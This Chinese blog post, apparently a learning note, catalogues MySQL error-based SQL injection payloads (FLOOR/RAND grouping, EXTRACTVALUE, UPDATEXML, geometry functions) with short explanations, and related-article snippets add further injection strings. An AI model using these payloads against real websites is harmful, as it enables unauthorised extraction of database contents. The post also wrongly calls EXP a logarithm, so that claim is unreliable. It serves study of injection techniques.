各种SQL报错函数

最新推荐文章于 2023-02-13 11:38:10 发布
最新推荐文章于 2023-02-13 11:38:10 发布
阅读量1.1k 收藏 2
点赞数 1
文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43680406/article/details/122385703
版权

文章目录

FLOOR

先写上payload:

SELECT 1 FROM (SELECT COUNT(*),CONCAT(DATABASE(),FLOOR(RAND()*2))t FROM mypassword.`password` GROUP BY t)i

Floor()的作用:去掉小数部分
Rand()随机生成0~1范围内的小数,rand()*2可以令整数位可能产生1,而不至于再经过floor函数之后全为0
还有就是floor(rand()*2)的结果是可控的,产生011011

上述payload的描述
在经过查询(select)之后,会产生一个虚拟表,将CONCAT字段设置未t
然后再将这个虚拟表交给group by处理,处理结果是新的虚拟表,将其命名为i

报错原理:
就在于group by处,因为此命令是为了分组,所以,不能插入重复的t,对于重复的t,应该做count。比如下图
对于一张空的虚拟表
在这里插入图片描述
现在来了一条数据,key为1,然后查看表,没有key为1的值,那么插入
结果就是
在这里插入图片描述
然后又来了一个key为1的数据,那么查看表,已经有了key为1,所以,就做++,结果为
在这里插入图片描述
来了key为0,则同理,做插入
而floor(rand()2)的作用就是再已经存在key为1或(0)的情况下,再次插入key为1或(0)的数据,而不是++,这时就导致了报错
在上述的payload中,floor(rand()2)很明显是出现了两次,而它页执行了两次,
假设虚拟表中已经有了,如下
在这里插入图片描述
然后继续floor(rand2),结果可能是0,那么结果应该是插入一条数据,然后后边的floor(rand2)再运算一次,结果可能是1,那么就相当于插入1,然后就报错了。

EXTRACTVALUE

Payload:

SELECT * FROM users WHERE user_id=1 AND (EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e)));

此函数从目标XML中返回包含所查询值的字符串.
语法:extractvalue(XML_document,xpath_string)
第一个参数:string格式,为XML文档对象的名称 第二个参数:xpath_string(xpath格式的字符串)而报错点就位于xpath_string,当这个参数的格式不符合xpath语法时,就会产生报错
上边的paylaod中,0x7e时不符合xpath语法的,还有(select DATABASE()) 外边的这层括号可不能丢掉
结果如图
在这里插入图片描述

UPDATEXML

Payload:

SELECT * FROM users WHERE user_id=1 AND (UPDATEXML(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e),0x7e));

函数构成:UPDATEXML (XML_document, XPath_string, new_value);
和上边的extractvalue相对来说,updatexml是用来修改xml的,而extractvalue是用来查询xml的,用法都一样
在这里插入图片描述

EXP

我是从下方网站学习到的报错方式
exp学习
此函数是以e为底的对数函数(我之前一直以为这是指数函数,理解错了)

POLYGON

Payload:

SELECT * FROM users WHERE user_id=1 AND  POLYGON((SELECT * FROM(SELECT * FROM(SELECT DATABASE())a)b))

这函数是干啥的,我也不知道,好像和空间数据类型有关,记住payload就行了
在这里插入图片描述

MULTIPOINT

Payload:

SELECT * FROM users WHERE user_id=1 AND  MULTIPOINT((SELECT * FROM(SELECT * FROM(SELECT DATABASE())a)b))

在这里插入图片描述

MULTILINESTRING

Payload:

SELECT * FROM users WHERE user_id=1 AND  MULTILINESTRING((SELECT * FROM(SELECT * FROM(SELECT DATABASE())a)b))

在这里插入图片描述

LINESTRING

Payload:

SELECT * FROM users WHERE user_id=1 AND   LINESTRING((SELECT * FROM(SELECT * FROM(SELECT DATABASE())a)b))

在这里插入图片描述

MULTIPOLYGON

Payload:

SELECT * FROM users WHERE user_id=1 AND MULTIPOLYGON((SELECT * FROM(SELECT * FROM(SELECT DATABASE())a)b))

在这里插入图片描述

GEOMETRYCOLLECTION

Payload:

SELECT * FROM users WHERE user_id=1 AND GEOMETRYCOLLECTION((SELECT * FROM (SELECT * FROM(SELECT DATABASE())a)b))

在这里插入图片描述

polygon,multipoint,GeometryCollection,multilinestring,multipolygon,linestring

都是一个类型的,部分函数可以从下边这个链接中了解到
描述

香可可
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlserver数据库常用函数
10-13
1.DATEADD 2 2.DATEDIFF 4 3.DATENAME 5 4.DATEPART 7 5.DAY 9 6.GETDATE 10 7.GETUTCDATE 11 8.MONTH 11 9.YEAR 12 数学运算函数 13 1.ABS 13 2.ACOS 14 3.ASIN 15 4.ATAN 16 6.CEILING 18 8.COT 19 9.DEGREES 20 10.EXP 21 11.FLOOR 21 12.LOG 22 13.LOG10 23 14.PI 23 15.POWER 24 16.RADIANS 25 17.RAND 27 18.ROUND 28 20.SIN 32 21.SQUARE 32 22.SQRT 33 23.TAN 34 字符串函数 35 1.ASCII 35 2.CHAR 37 3.CHARINDEX 39 4.DIFFERENCE 41 5.LEFT 42 6.LEN 43 7.LOWER 44 8.LTRIM 45 9.NCHAR 46 10.PATINDEX 49 11.REPLACE 51 12.QUOTENAME 52 13.REPLICATE 53 14.REVERSE 56 15.RIGHT 57 16.RTRIM 59 17.SOUNDEX 60 18.SPACE 61 19.STR 62 20.STUFF 65
关于SQL注入的五大报错注入函数
05-14 1154
~全部都以查user()为例子~ 1.floor()id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) 2.extractvalue()id = 1 and (extractvalue(...
SQL四大注入报错函数
weixin_44352521的博客
12-12 226
1. floor() id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) 2. extractvalue() id = 1 and (extractvalue(1, concat(0x5c,(sele...
sql报错注入函数
pop364的博客
04-24 234
#1.floor() #数据尾部多一个1 #?id=1'and (select count(*) from information_schema.tables group by concat(database(),floor(rand(0)*2)))--+ #?id=1' union select 1,2,count(*) from information_schema.tables group ...
SQL注入报错注入函数
热门推荐
lightsec
03-15 1万+
前言 报错注入的前提是当语句发生错误时,错误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。 常用报错函数 updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数 extractvalue() 是mysql对xml文档数据进行查询的xpa...
基于函数报错sql漏洞查询
weixin_44720762的博客
04-07 264
基于报错的信息获取 简单介绍函数updatexml(): updatexml(xml_document,xpath_string,new_value): 其中第一个参数的document为文件名;第二个参数前面的xpath是xml中查询语言(至于更详细的xpath语法,读者可以自行百度),简单来说就是对第一个参数中的文件进行定位的,string代表格式;第三个参数表示重新定义查找到的数据,也就是说...
SQL Server 报错注入(一)
zzgslh的博客
12-25 3810
SQL Server报错注入 一、原理介绍 报错注入,顾名思义首先这里是有报错信息才可以,其次我们需要人为的制造一些错误,比如使用convert()函数进行类型转换时,如果转发失败就会报错,然后把我们要执行的SQL语句与convert()函数组合起来,报错的信息当中有咱们需要的信息。 二、函数介绍 – convert()函数介绍: convert(int,db_name()),含义是将第二个参数的值转换成第一个参数的int类型。利用mssql在转换类型的时候就出错,来爆数据库信息。 – quotename(
常见的SQL SERVER错误————WHERE子句的函数
shizheyangde的专栏
10-28 831
继续我的SQL SERVER常见错误系列,来看更多的T-SQL错误。错在哪里?如果你看到这样一个查询语句,你能看出问题来吗?select  o.OrderID  , o.CustomerID  , o.Qtyfrom Orders owheredatepart( yyyy, o.OrderDate)='2010'如果该表有1000条数据,这可能没有问题;但是该表若是有1,000,000条数据,那么这就有问题了。为什么呢?让我们来查看他们的执行计划。该表有1000行数据,该查询没有使用索引查询OrderDat
sql server 2005 T-SQL @@ERROR (Transact-SQL)
曹振华
12-20 569
返回执行的上一个 Transact-SQL 语句的错误号。 Transact-SQL 语法约定 语法 @@ERROR 返回类型 integer 备注 如果前一个 Transact-SQL 语句执行没有错误,则返回 0。如果前一个语句遇到错误,则返回错误号。如果错误是 sys.message
sqlserver2000中执行函数出错问题解决
oec2003的学习专栏
11-13 1487
    今天在sqlserver2000数据库中写了一个函数,然后想在存储过程中调用,但在创建存储过程的时候却出现了如下错误:仔细检查了函数,确实存在啊,没有任何问题,怎么会提示是不可识别的函数名呢郁闷了很久,原来是疏忽了一个小地方:出错代码:fnQuy_VQuotationText(QueryDetail.QueryDetailID) 尽管名称和你创建的函数名称一样,但就是不识别
SQL集合函数中case when then 使用技巧
谦虚使人发胖的博客
03-20 2323
我们都知道SQL中使用case when then来转化数据库中的信息 比如 select (case sex when 0 then '男' else '女' end) AS sex from studentInfo假设数据库有一张表名为student的表。如果现在要你根据这张表,查出江西省男女个数,广东省男生个数,浙江省男女个数 怎么写SQL语句?即要生成下结果表答案是:select sex ...
Sqlserver中容易忽略的错误
倾听内心的声音
04-22 526
1.字符串拼接     a.普通字符串与null字符串拼接    结果为null declare @str1 varchar(10), @str2 varchar(10) set @str1=null set @str2='hello' print @str2+@str1      b.普通字符串与‘’ 字符串拼接       结果为普通字符串本身 decla
SQL注入——利用函数报错来信息获取
m0_71714379的博客
02-13 282
web
SQL注入方法-报错注入
acepanhuan的博客
02-11 1007
SQL注入方法-报错注入
sql报错注入简单介绍
xiaolong22333的博客
08-12 339
sql报错注入 updatexml() UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 。 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 。 作用:改变文档中符合条件的节点的值。 undatexml(1,(查询
R - sqldf
vshadow的专栏
02-27 3668
R的sqldf包能对dataframe进行sql操作,对于习惯用sql的人来说比较方便。library(sqldf) TA <- read.csv('table-A.csv', header = TRUE, sep = ",") TB <- read.csv('table-B.csv', header = TRUE, sep = ",") #mergedData <- mer...
mysql报错函数_MySQL十大报错函数
weixin_36124750的博客
01-18 852
1.Floor()round() 遵循四舍五入把原值转化为指定小数位数,如:round(1.45,0) = 1;round(1.55,0)=2floor()向下舍入为指定小数位数 如:floor(1.45,0)= 1;floor(1.55,0) = 1ceiling()向上舍入为指定小数位数 如:ceiling(1.45,0) = 2;ceiling(1.55,0)=2floor(x),返回小于或...
SQL注入的报错注入函数
cyjmosthandsome的博客
02-26 6711
一、extractvalue() extractvalue(xml_frag,xpath_expr)函数接受两个参数,第一个为XML标记内容,也就是查询的内容,第二个为XPATH路径,也就是查询的路径。如果没有匹配内容,不管出于何种原因,只要xpath_expr有效,并且xml_frag由正确嵌套和关闭的元素组成 - 返回空字符串。不区分空元素的匹配和无匹配。但是如果X...
SQL报错注入的12个函数sql注入语句
weixin_30852451的博客
07-09 1264
转来的 侵删 1、通过floor报错,注入语句如下: andselect1from(selectcount(*),concat(version(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a); 2、通过ExtractValue报错,注入语句如下: andextractva...
sql中窗口函数报错怎么办
最新发布
04-07
SQL中,窗口函数是一种强大的功能,可以对查询结果进行分组、排序和聚合操作。然而,有时候在使用窗口函数时可能会遇到一些错误。以下是一些常见的窗口函数错误及其解决方法: 1. "窗口函数不在GROUP BY子句中"错误: 这个错误通常发生在使用窗口函数时没有正确使用GROUP BY子句的情况下。解决方法是确保在SELECT语句中包含所有非聚合列,并将窗口函数与GROUP BY子句一起使用。 2. "窗口函数不允许在WHERE子句中"错误: 这个错误通常发生在尝试在WHERE子句中使用窗口函数时。解决方法是将窗口函数移动到SELECT语句中,并使用HAVING子句来过滤结果。 3. "窗口函数不允许在GROUP BY子句中"错误: 这个错误通常发生在尝试在GROUP BY子句中使用窗口函数时。解决方法是将窗口函数移动到SELECT语句中,并使用聚合函数来替代窗口函数。 4. "窗口函数不允许在ORDER BY子句中"错误: 这个错误通常发生在尝试在ORDER BY子句中使用窗口函数时。解决方法是将窗口函数移动到SELECT语句中,并使用别名来引用窗口函数的结果。 5. "窗口函数不允许在GROUP BY子句中的HAVING子句中"错误: 这个错误通常发生在尝试在GROUP BY子句的HAVING子句中使用窗口函数时。解决方法是将窗口函数移动到SELECT语句中,并使用HAVING子句来过滤结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值